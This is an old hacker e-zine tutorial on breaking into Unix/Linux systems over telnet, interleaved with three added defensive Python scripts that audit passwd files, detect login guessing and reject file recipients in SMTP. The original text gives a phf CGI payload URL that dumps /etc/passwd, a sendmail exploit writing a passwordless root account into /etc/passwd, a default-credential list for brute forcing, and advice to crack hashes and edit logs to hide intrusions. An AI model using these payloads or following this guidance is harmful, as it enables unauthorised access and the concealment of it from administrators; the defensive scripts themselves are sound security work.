

                        ***Hacking Unix/Linux systems***
                                   Via Telnet
                                By: Techno Phunk

O.k., there has been enough virus writing in our e-zine, and I finally
decided to jump in and talk a little about hacking. For your first
lesson I am going to teach you a LITTLE about hacking Linux/Unix
systems via telnet; later I will teach more about telenet (Sprintnet)
and direct dialups, and eventually I will teach you how to hack
VAX/VMS, but not until you master Unix/Linux should you even ATTEMPT
a VAX. Believe me, it's for the elite only, as it is NOT as buggy as
Linux/Unix. Anyway, a little history on Unix.

 History
--=====--
 The Unix OS originated from AT&T in the early 1970s. Because UNIX was
 able to run on different hardware from different vendors, developers
 were able to modify the OS and distribute their own versions. USL's
 (new makers) System V, Berkeley Standard Distribution (BSD, from the
 University of California, Berkeley), Xenix, etc. are just a few
 examples. Now on with the show...

 The Unix system/Linux system has been known to have multiple
exploits that can be used against them, one of which is the famous
phf bug: http://www.domain.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
This bug of course is almost totally outdated, with the exception of a
lot of the lesser-known .edu sites, and .gov/.net sites. Of course many
other bugs are also unique to this system, such as the Sendmail bugs,
like the one where the software could send mail DIRECTLY to a file, so
someone could write an extra account into the passwd file and gain
root access. I personally have a multitude of exploits that I have
committed to memory and could use anywhere without referring to any
files. From here on, I will be telling a lot more about hacking Unix
systems (and Linux; they're basically the same, people) from a telnet
platform, what to do, etc....

First of all, before hacking a system, examine it and get all the
info you can on it: finger them (port 79), ping them, do whatever
you can to get all the info possible, think about who the sysop is,
etc. Just don't do any destruction, as this is *LAME*; it makes you a
CYBERPUNK, not a hacker, and last but not least it makes people WANT
to catch you and spend money looking for you. Also, the FBI/Secret
Service won't take the case unless $1000 of damages are done.

Now then
------
You need a good telnet program, such as the one that comes with
Win95 or my personal favorite, EWAN; anyway, any telnet software
should be fine. You will also need a PPP/SLIP/Winsock
connection. If you are on AOL, don't despair; it will work as long
as you use v3.0 of AOL or above.

Now that you have found a good telnet program we can go on...
Now somehow you must get a password to this system, preferably
to the sysadmin account or root (unfortunately, the root account can
only be remotely accessed on Redhat Linux and some of the BSDs),
or any of the shell accounts (if you wish). Anyway, there are several
ways to do this. First would be social engineering, if that is
possible. Social engineering is quite simple: all you must do is trick
a person into giving you information. A lesson on social engineering
will be covered in the next file (if I get around to it, in this
issue). Next you can pull an exploit such as the phf bug (if it hasn't
already been taken off), and if you do pull the phf bug, and the file
looks like this:

root:*:0:1:system PRIVILEGED account,,,:/:/usr/bin/sh
daemon:*:1:1:system background account:/:
       ^ notice the star
then forget it; since this file is shadowed, you will need to try
something else.

but if it looks sorta like this:
root:WAdadtiA:0:1:system PRIVILEGED account,,,:/:/usr/bin/sh
daemon:dCDa2Hn:1:1:system background account:/:

(the file will look SOMETHING like this) then you are home free to
d/l this and then run a password cracker on it. Yet this is not
hacking yet... in order for any type of break-in (into a computer) to
become a hack you must learn about the system, how it works and the
like, since hacking is simply a way of gathering information.

Now if the phf bug or one of the many exploits works and you get the
UNshadowed password file, then all you must do is crack it, and write
down or save all the logins and passwords that were found (some
crackers do this for you). I personally use Cracker Jack with multiple
word lists. Now move on to the next stage, which will be picked up
after I tell you what to do if this doesn't work.
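Here is an added example, not part of Techno Phunk's file, showing the
same passwd check from the sysadmin's side. It is a small Python script
that parses passwd(5) records and reports the three things an admin
wants to catch before anyone else does: hashes sitting in the passwd
file itself instead of a shadow file, accounts with an empty password
field (a bare Enter logs you in), and any uid-0 account that is not
root. The sample records are constructed for the demo, modelled on the
two snippets shown above.

```python
"""Audit passwd(5) records for the weaknesses this article leans on.

Added example, not from the original article. Flags: password hashes
stored in the passwd file itself (the "unshadowed" case), accounts with
an empty password field, and uid-0 accounts other than root.
"""
from dataclasses import dataclass

# Constructed sample records, modelled on the two snippets in the article.
SAMPLE_SHADOWED = """\
root:*:0:1:system PRIVILEGED account,,,:/:/usr/bin/sh
daemon:*:1:1:system background account:/:
"""

SAMPLE_UNSHADOWED = """\
root:WAdadtiA:0:1:system PRIVILEGED account,,,:/:/usr/bin/sh
daemon:dCDa2Hn:1:1:system background account:/:
Wizard::0:0:Super User:/:/bin/csh
"""

# Field-2 values that mean "no usable hash here": shadowed ("x") or locked.
NOT_A_HASH = {"x", "*", "!", "!!"}


@dataclass
class PasswdEntry:
    name: str
    pw: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text):
    """Parse passwd(5) text into PasswdEntry objects; blank and # lines are skipped."""
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, pw, int(uid), int(gid), gecos, home, shell))
    return entries


def audit_passwd(text):
    """Return {"unshadowed": [...], "empty_password": [...], "extra_uid0": [...]}."""
    findings = {"unshadowed": [], "empty_password": [], "extra_uid0": []}
    for e in parse_passwd(text):
        if e.pw == "":
            # Empty field: the login program accepts a bare Enter as the password.
            findings["empty_password"].append(e.name)
        elif e.pw not in NOT_A_HASH and not e.pw.startswith("!"):
            # A real hash in a world-readable file can be cracked offline by
            # anyone who can fetch the file.
            findings["unshadowed"].append(e.name)
        if e.uid == 0 and e.name != "root":
            # Any second uid-0 account is root under another name.
            findings["extra_uid0"].append(e.name)
    return findings


if __name__ == "__main__":
    for label, sample in (("shadowed", SAMPLE_SHADOWED), ("unshadowed", SAMPLE_UNSHADOWED)):
        print(label, audit_passwd(sample))
```

Run it against a real /etc/passwd by reading the file into audit_passwd;
a clean shadowed system reports three empty lists, and anything in
extra_uid0 or empty_password deserves an immediate look.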

If no exploits work then you're going to have to go with the next
part... brute forcing and defaults.
I will be nice and include one of my personal (ONE of them) lists
that I use for brute forcing. Brute forcing is covered in the latest
issue of 2600 magazine (Volume 14, No. 3, Autumn 1997), but I will
explain this ancient art here too. Brute forcing is basically the act
of hammering out passwords at a specific account name (such as in this
example: sysadmin) until you get in; this is the last resort to
get into a system that seems to have NOOO exploits or wide open
back doors. Brute forcing can be tediously done by hand or
simply by a script. The problem with bruting Unix systems is that
after 3 login attempts (in most cases) they will simply log you off,
so you would simply have to see how many chances you have and then
program the script accordingly. Keep in mind that all your activities
are probably going to be logged, so once you get in, modify those logs
to cover up your tracks, or use a program (available almost ANYWHERE).
Anyway... here is a list of default passwords and logins to try first
before you attempt a brute force. In most cases this list may work, or
then again it may not; it just depends on the system admin's IQ :).

------------------------------------------------------------------
Login:                          Password:

root                                    root
root                                    system
sys                                     sys
sys                                     system
daemon                                  daemon
uucp                                    uucp
tty                                     tty
test                                    test
unix                                    unix
unix                                    test
bin                                     bin
adm                                     adm
adm                                     admin
admin                                   adm
admin                                   admin
sysman                                  sysman
sysman                                  sys
sysman                                  system
sysadmin                                sysadmin
sysadmin                                sys
sysadmin                                system
sysadmin                                admin
sysadmin                                adm
who                                     who
learn                                   learn
uuhost                                  uuhost
guest                                   guest
host                                    host
nuucp                                   nuucp
rje                                     rje
games                                   games
games                                   player
sysop                                   sysop
root                                    sysop
demo                                    demo
SYSTEM                                  OPERATOR
SYSTEM                                  MANAGER
SYSTEM                                  SYSTEM
SYSTEM                                  SYSLIB
OPERATOR                                OPERATOR
SYSTEST                                 UETP
SYSTEST                                 SYSTEST
SYSTEST                                 TEST
SYSMAINT                                SYSMAINT
SYSMAINT                                SERVICE
SYSMAINT                                DIGITAL
FIELD                                   FIELD
FIELD                                   SERVICE
GUEST                                   GUEST
GUEST                                   unpassworded
DEMO                                    DEMO
DEMO                                    unpassworded
TEST                                    TEST

Note: unpassworded means to just hit enter when it prompts for a PW
-------------------------------------------------------------------
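The brute-forcing section says two things that matter to whoever runs
the box: login drops you after a few failures, and every attempt is
logged. Here is an added example (not part of the original file) of
what the sysadmin's side of that looks like: a Python script that reads
syslog-style lines in the "FAILED LOGIN n FROM host FOR user" and
"LOGIN ON tty BY user FROM host" layouts the login program writes,
flags any source host with too many failures, notes whether the names
tried come from the default-login list above, and calls out a success
that follows guessing from the same host. The log lines are constructed
for the demo, not a real capture.

```python
"""Spot password guessing against a Unix login from syslog-style log lines.

Added example, not from the original article. Counts FAILED LOGIN lines
per source host, flags sources over a threshold, and reports a successful
login that follows guessing from the same source.
"""
import re
from collections import defaultdict

# Constructed sample log (not a real capture), in classic syslog layout.
SAMPLE_LOG = """\
Oct  3 22:14:01 shell login[1042]: FAILED LOGIN 1 FROM 10.0.0.7 FOR root, Authentication failure
Oct  3 22:14:05 shell login[1042]: FAILED LOGIN 2 FROM 10.0.0.7 FOR root, Authentication failure
Oct  3 22:14:09 shell login[1042]: FAILED LOGIN 3 FROM 10.0.0.7 FOR root, Authentication failure
Oct  3 22:14:20 shell login[1051]: FAILED LOGIN 1 FROM 10.0.0.7 FOR sysadmin, Authentication failure
Oct  3 22:14:24 shell login[1051]: FAILED LOGIN 2 FROM 10.0.0.7 FOR sysadmin, Authentication failure
Oct  3 22:14:28 shell login[1051]: FAILED LOGIN 3 FROM 10.0.0.7 FOR sysadmin, Authentication failure
Oct  3 22:15:02 shell login[1060]: FAILED LOGIN 1 FROM 10.0.0.7 FOR guest, Authentication failure
Oct  3 22:15:06 shell login[1060]: LOGIN ON ttyp2 BY guest FROM 10.0.0.7
Oct  3 22:30:11 shell login[1102]: FAILED LOGIN 1 FROM 192.168.5.20 FOR alice, Authentication failure
Oct  3 22:30:19 shell login[1102]: LOGIN ON ttyp3 BY alice FROM 192.168.5.20
"""

FAILED_RE = re.compile(r"FAILED LOGIN \d+ FROM (\S+) FOR (\S+),")
SUCCESS_RE = re.compile(r"LOGIN ON \S+ BY (\S+) FROM (\S+)")

# The Unix login names from the default list in this article. A failure
# against one of these is a stronger signal than a real user's typo.
DEFAULT_LOGINS = {
    "root", "sys", "daemon", "uucp", "tty", "test", "unix", "bin", "adm",
    "admin", "sysman", "sysadmin", "who", "learn", "uuhost", "guest", "host",
    "nuucp", "rje", "games", "sysop", "demo",
}


def analyze_auth_log(text, threshold=3):
    """Return alerts for sources with >= threshold failures, plus any success
    that follows guessing from the same source."""
    failures = defaultdict(int)
    accounts = defaultdict(set)
    success_after_guessing = []
    for line in text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            src, user = m.groups()
            failures[src] += 1
            accounts[src].add(user)
            continue
        m = SUCCESS_RE.search(line)
        if m:
            user, src = m.groups()
            # A login that lands after a run of failures from the same host is
            # the event worth paging someone about.
            if failures.get(src, 0) >= threshold:
                success_after_guessing.append((src, user))
    alerts = []
    for src, n in sorted(failures.items()):
        if n >= threshold:
            tried = sorted(accounts[src])
            alerts.append({
                "source": src,
                "failures": n,
                "accounts": tried,
                "default_logins": sorted(set(tried) & DEFAULT_LOGINS),
            })
    return {"alerts": alerts, "success_after_guessing": success_after_guessing}


if __name__ == "__main__":
    result = analyze_auth_log(SAMPLE_LOG)
    for a in result["alerts"]:
        print(f"{a['source']}: {a['failures']} failures against {a['accounts']} "
              f"(default names: {a['default_logins']})")
    for src, user in result["success_after_guessing"]:
        print(f"SUCCESS after guessing: {user} from {src}")
```

The threshold of 3 matches the "3 login attempts" the text mentions;
a host that keeps reconnecting to get fresh attempts still accumulates
under one source address, which is why the count is per source rather
than per process id.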

Now then, I will cover some basic exploits, etc., and the brute force
list will be attached to the bottom of this file.

Exploits.
==========

Most exploits covered here are probably not going to work on, like, the
CIA or something like that, but these are classic and common exploits.
If you want to see more "up to date" exploits I recommend rootshell.com,
which has a NICE collection that is useful for some situations.
The following bugs will need you to have at least an IQ of 2 and
telnet/ftp/http/etc. programs.

First of all I'd like to cover some of the "sendmail exploits".
One of the most famous, but it usually doesn't work (on up-to-date
systems); in other words, if the system you're hacking is up-to-date,
or is older but updated CONSTANTLY, then chances are 10-1 it won't
work, but you never know, so TRY IT! It never hurts to T-R-Y. When
people say "teach me to hack" I say "trial and error", and that is
all; what else do I need to say? Well, basically this exploit takes
advantage of Sendmail's ability to send mail DIRECTLY to files on the
host system, e.g. TO: /etc/passwd. Anyway, what you do is basically
send mail to the passwd file and then log in with the "unpassworded"
root-access account that you create. Now since I know this is a
"newbie" file I will explain a bit about sendmail: how to use it, what
it is, its past, future, and its role in the Unix/Linux/BSD
environment.

Sendmail is obviously an SMTP program; SMTP stands for Simple Mail
Transfer Protocol, if I am correct (I hit my head many times on walls
and things). Anyway, basically it allows a user to send mail to any
Internet or local user. The Sendmail program, like the finger program,
runs on a certain port: finger runs on port 79 and is USUALLY open for
remote access, but sendmail (port 25) is ALWAYS open, unless the user
doesn't use sendmail, which is still EXTREMELY unusual; the only
people I know that don't run it are fellow hackers. Anyway, in order
to access it you must *TELNET* (remember that program I told you to
get) to port 25 of your target machine. Now in order to get the target
machine's IP address you must do a whois (or a DNS lookup). Now, you
may get a DNS lookup/whois program for Winblows; all you need is a
valid Internet connection, but I use either a. a shell account, b.
InterNIC (http://www.internic.com), or c. /dns on mIRC; in other
words, type /dns yahoo.com and it will say "Resolved yahoo.com to"
and then a number, which is the IP. Now that you have the IP of your
target you must telnet to that 'host'. Now if you're smart, or like
me, you WILL be sure you know all the information possible about your
"target". Back onto sendmail: when you first connect it SHOULD say
SOMETHING like this:
Sendmail 8.3.2 (host) ready to go.... anyway, something like that.

Once you see this, hit enter (it should report something like "unknown
command"); this is needed since we are using a telnet program, not an
SMTP program. Anyway, from here you can explore the commands (type
HELP); otherwise hang with me for a few. Now, from here, to pull the
exploit you do the following:

Mail FROM: root@whatever.com (this could be whatever you want)
RCPT TO: /etc/passwd

Now if it says "cannot send mail directly to files" then forget this
exploit. Otherwise type:

data

then it should say something like:

Type your message and type a period (".") on a blank line when done
then you type:
Wizard::0:0:Super User:/:/bin/csh
.

Now it should say mail accepted for delivery.
Now then, you can change Wizard to whatever, but for a beginner, just
leave it. Now since this worked, you may now go through "normal"
telnet (port 23); the login would be Wizard, and for the password
just hit enter. Now wasn't that easy?
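The whole trick above rests on the server answering "250" to a RCPT
that names a file; the "cannot send mail directly to files" reply the
text tells you to give up on is the fix. Here is an added example, not
part of the original file and not sendmail's own code, of that
recipient check in Python, with a tiny replay of the MAIL/RCPT/DATA
exchange so the refusal can be seen in context. The mailbox grammar is
a simplified stand-in for the real SMTP one (an assumption made here
to keep the example short), and the reply texts are chosen for the demo.

```python
"""Reject SMTP recipients that name a file instead of a mailbox.

Added example, not from the original article and not sendmail's own code.
validate_rcpt() is the check an MTA (or a filtering front end) applies to
each RCPT argument; run_session() replays a short client/server exchange
through a minimal MAIL/RCPT/DATA state machine.
"""
import re

# Simplified mailbox form: local-part@domain, angle brackets optional.
MAILBOX_RE = re.compile(r"^<?([A-Za-z0-9._%+-]+)@([A-Za-z0-9.-]+\.[A-Za-z]{2,})>?$")


class RcptRejected(Exception):
    """Raised with the reason text for a 550 reply."""


def validate_rcpt(arg):
    """Return (local, domain) for an acceptable RCPT argument, else raise RcptRejected."""
    addr = arg.strip()
    if addr.upper().startswith("TO:"):      # the command carries "TO:" in front
        addr = addr[3:].strip()
    bare = addr.strip("<>").strip()
    if bare.startswith("/"):
        # This is the exact case the article exploits: a path as recipient.
        raise RcptRejected("cannot send mail directly to files")
    if bare.startswith("|"):
        # Same idea aimed at a program instead of a file; refuse it too.
        raise RcptRejected("cannot send mail directly to programs")
    m = MAILBOX_RE.match(addr)
    if not m:
        raise RcptRejected("syntax error in recipient address")
    return m.group(1), m.group(2)


def smtp_reply_for_rcpt(arg):
    """Turn the validation result into an SMTP reply line."""
    try:
        local, domain = validate_rcpt(arg)
    except RcptRejected as err:
        return f"550 5.7.1 {err}"
    return f"250 2.1.5 <{local}@{domain}>... Recipient ok"


def run_session(commands):
    """Replay client commands through a tiny MAIL/RCPT/DATA state machine.

    Returns the list of server replies, one per command.
    """
    replies = []
    have_sender = False
    recipients = []
    for cmd in commands:
        verb, _, arg = cmd.partition(" ")
        verb = verb.upper()
        if verb == "MAIL":
            have_sender = True
            recipients = []
            replies.append("250 2.1.0 Sender ok")
        elif verb == "RCPT":
            if not have_sender:
                replies.append("503 5.5.1 Need MAIL before RCPT")
            else:
                reply = smtp_reply_for_rcpt(arg)
                if reply.startswith("250"):
                    recipients.append(arg)
                replies.append(reply)
        elif verb == "DATA":
            # With no accepted recipient there is nothing to deliver to,
            # so the DATA step of the exploit is refused as well.
            if recipients:
                replies.append('354 Enter mail, end with "." on a line by itself')
            else:
                replies.append("554 5.5.1 No valid recipients")
        else:
            replies.append("500 5.5.1 Command unrecognized")
    return replies


if __name__ == "__main__":
    script = ["Mail FROM: root@whatever.com", "RCPT TO: /etc/passwd", "data"]
    for c, r in zip(script, run_session(script)):
        print(f"C: {c}\nS: {r}")
```

The path test runs before the address grammar on purpose: a server that
merely reports "syntax error" still tells a caller nothing wrong, but
a clear "cannot send mail directly to files" is the reply a sysadmin
can grep for in the mail log to see who tried.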

Now, one more program you may want to get is called a port scanner;
this will find all open ports for you and tell you what they are.
Now for those with trouble finding one, here is a list of "cool" ports
to try out (BTW, this is from my personal collection; I don't
remember, however, where I got this):

note: some of these will work on some systems, others won't (chance)
-----------------------------
        tcpmux          1/tcp                         # rfc-1078
        echo            7/tcp
        echo            7/udp
        discard         9/tcp           sink null
        discard         9/udp           sink null
        systat          11/tcp          users
        daytime         13/tcp
        daytime         13/udp
        netstat         15/tcp
        qotd            17/tcp          quote
        chargen         19/tcp          ttytst source
        chargen         19/udp          ttytst source
        ftp-data        20/tcp
        ftp             21/tcp
        telnet          23/tcp
        smtp            25/tcp          mail
        time            37/tcp          timserver
        time            37/udp          timserver
        rlp             39/udp          resource      # resource location
        name            42/udp          nameserver
        whois           43/tcp          nicname       # usually to sri-nic
        domain          53/tcp
        domain          53/udp
        mtp             57/tcp                        # deprecated
        bootps          67/udp                        # bootp server
        bootpc          68/udp                        # bootp client
        tftp            69/udp
        gopher          70/tcp                        # gopher server
        rje             77/tcp
        finger          79/tcp
        http            80/tcp
        www             80/tcp
        link            87/tcp          ttylink
        kerberos        88/udp          kdc
        kerberos        88/tcp          kdc
        supdup          95/tcp                        # BSD supdupd(8)
        hostnames       101/tcp         hostname      # usually to sri-nic
        iso-tsap        102/tcp
        x400            103/tcp                       # ISO Mail
        x400-snd        104/tcp
        csnet-ns        105/tcp
        pop-2           109/tcp                       # PostOffice V.2
        pop-3           110/tcp                       # PostOffice V.3
        pop             110/tcp                       # PostOffice V.3
        sunrpc          111/tcp
        sunrpc          111/tcp         portmapper    # RPC 4.0 portmapper UDP
        sunrpc          111/udp
        sunrpc          111/udp         portmapper    # RPC 4.0 portmapper TCP
        auth            113/tcp         ident         # User Verification
        sftp            115/tcp
        uucp-path       117/tcp
        nntp            119/tcp         usenet        # Network News Transfer
        ntp             123/tcp                       # Network Time Protocol
        ntp             123/udp                       # Network Time Protocol
        netbios-ns      137/tcp         nbns
        netbios-ns      137/udp         nbns
        netbios-dgm     138/tcp         nbdgm
        netbios-dgm     138/udp         nbdgm
        netbios-ssn     139/tcp         nbssn
        imap            143/tcp                       # imap ntwrk mail prtcl
        NeWS            144/tcp         news          # Window System
        snmp            161/udp
        snmp-trap       162/udp
        exec            512/tcp                       # BSD rexecd(8)
        biff            512/udp         comsat
        login           513/tcp                       # BSD rlogind(8)
        who             513/udp         whod          # BSD rwhod(8)
        shell           514/tcp         cmd           # BSD rshd(8)
        syslog          514/udp                       # BSD syslogd(8)
        printer         515/tcp         spooler       # BSD lpd(8)
        talk            517/udp                       # BSD talkd(8)
        ntalk           518/udp                       # SunOS talkd(8)
        efs             520/tcp                       # for LucasFilm
        route           520/udp         router routed # 521/udp too
        timed           525/udp         timeserver
        tempo           526/tcp         newdate
        courier         530/tcp         rpc           # experimental
        conference      531/tcp         chat
        netnews         532/tcp         readnews
        netwall         533/udp                       # emergency broadcasts
        uucp            540/tcp         uucpd         # BSD uucpd(8) UUCP serv
        klogin          543/tcp                       # Kerberos authen rlogin
        kshell          544/tcp         cmd           # and remote shell
        new-rwho        550/udp         new-who       # experimental
        remotefs        556/tcp         rfs_server rfs# Brunhoff rem filesys
        rmonitor        560/udp         rmonitord     # experimental
        monitor         561/udp                       # experimental
        pcserver        600/tcp                       # ECD Integrated PCb svr
        mount           635/udp                       # NFS Mount Service
        pcnfs           640/udp                       # PC-NFS DOS Authen
        bwnfs           650/udp                       # BW-NFS DOS Authen
        kerberos-adm    749/tcp                       # Kerberos 5adm/changepw
        kerberos-adm    749/udp                       # Kerberos 5adm/changepw
        kerberos-sec    750/udp                       # Kerberos authen--udp
        kerberos-sec    750/tcp                       # Kerberos authen--tcp
        kerberos_master 751/udp                       # Kerberos authen
        kerberos_master 751/tcp                       # Kerberos authen
        krb5_prop       754/tcp                       # Kerberos slave propaga
        listen          1025/tcp        listener RFS remote_file_sharing
        nterm           1026/tcp        remote_login network_terminal
        kpop            1109/tcp                      # Pop with Kerberos
        ingreslock      1524/tcp
        tnet            1600/tcp                      # transputer net daemon
        mud(2000)       2000/tcp                      ## Diku2 MultiUser Dimen
        cfinger         2003/tcp                      # GNU finger
        nfs             2049/udp                      # NFS File Service
        eklogin         2105/tcp                      # Kerberos encrypT rlogi
        mud(4000)       4000/tcp                      ## Diku2 MultiUser Dimen
        mud(4240)       4240/tcp                      ## Diku2 MultiUser Dimen
        mud(4242)       4242/tcp                      ## Diku2 MultiUser Dimen
        krb524          4444/tcp                      # Kerberos 5 to 4 ticket
        irc(6666)       6666/tcp                      ## Alternate IRC port
        irc             6667/tcp                      # Internet Relay Chat
        irc(6668)       6668/tcp                      ## Alternate IRC port
        dos             7000/tcp        msdos
-------------------------------------------------------------------

Anyway, now, I won't list many more exploits now, as there are
millions of them on the net, especially around http://www.rootshell.com

Now, I will go into what you do once you are in....

Commands that are useful to you at this time are going to be things like:

ls                  * list files
cd                  * change DIR note: cd .. goes back, cd / is used instead
                    * of the MS-DOS equivalent: cd\
who                 * who's online
finger              * get info on a user
pico                * one of the text editors
cat                 * display file (like type in MS-DOS)
cc                  * compiler for C programs (exploits ;)

That should get you started; note that this should work in the C shell
and in Korn shells...

Now, lastly, I hope that you have learned something from all this...
More info can be found at: http://www.angelfire.com/nc/TechnoPhunk/index.html
under the hacking page. I am trying to get more stuff on it, but there
are some other tutorials and other info there, so be sure to stop by.

Now, for a word on ethics....
1. thou shalt not change anything except for the logs (to cover yourself)
2. thou shalt not do destruction
3. don't tell your friends/family/etc that you are a hacker
4. never tell your real name to other hackers
5. never leave behind your handle or name on a hacked server
6. be kind

That's about all for this lesson.... I realise it was short and not
VERY informative, but it should give you a start. I hope to cover more
on Unix hacking next time, possibly a bit more on the BSDs and Linux.
Send me suggestions.... TechnoPhunk@thepentagon.com

- Techno Phunk

